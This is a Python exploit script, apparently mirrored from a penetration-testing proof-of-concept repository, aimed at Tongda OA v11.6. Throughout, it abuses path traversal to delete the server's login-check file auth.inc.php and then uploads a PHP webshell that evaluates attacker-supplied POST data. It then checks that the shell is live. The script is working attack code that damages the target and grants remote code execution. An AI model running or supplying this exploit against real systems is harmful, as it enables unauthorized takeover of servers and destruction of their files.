mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-06-20 01:40:29 +00:00
33 lines
1.3 KiB
Python
33 lines
1.3 KiB
Python
import requests
|
||
|
||
# 通达OA v11.6 RCE EXP
|
||
# 注意,会删除 auth.inc.php 文件,这个文件是判断用户是否登陆的文件,如果没有登陆就不能上传,所以把这个文件删掉就可以成功上传webshell了。
|
||
target = "http://127.0.0.1:1234/"
|
||
payload = "<?php eval($_POST['pass']);?>"
|
||
print(
|
||
"[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA"
|
||
)
|
||
input("Press enter to continue")
|
||
print("[*]Deleting auth.inc.php....")
|
||
url = target + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
|
||
requests.get(url=url)
|
||
print("[*]Checking if file deleted...")
|
||
url = target + "/inc/auth.inc.php"
|
||
page = requests.get(url=url).text
|
||
if 'No input file specified.' not in page:
|
||
print("[-]Failed to deleted auth.inc.php")
|
||
exit(-1)
|
||
print("[+]Successfully deleted auth.inc.php!")
|
||
print("[*]Uploading payload...")
|
||
url = target + "/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
|
||
files = {'FILE1': ('deconf.php', payload)}
|
||
requests.post(url=url, files=files)
|
||
url = target + "/_deconf.php"
|
||
page = requests.get(url=url).text
|
||
|
||
if 'No input file specified.' not in page:
|
||
print("[+]Filed Uploaded Successfully")
|
||
print("[+]URL:", url)
|
||
else:
|
||
print("[-]Failed to upload file")
|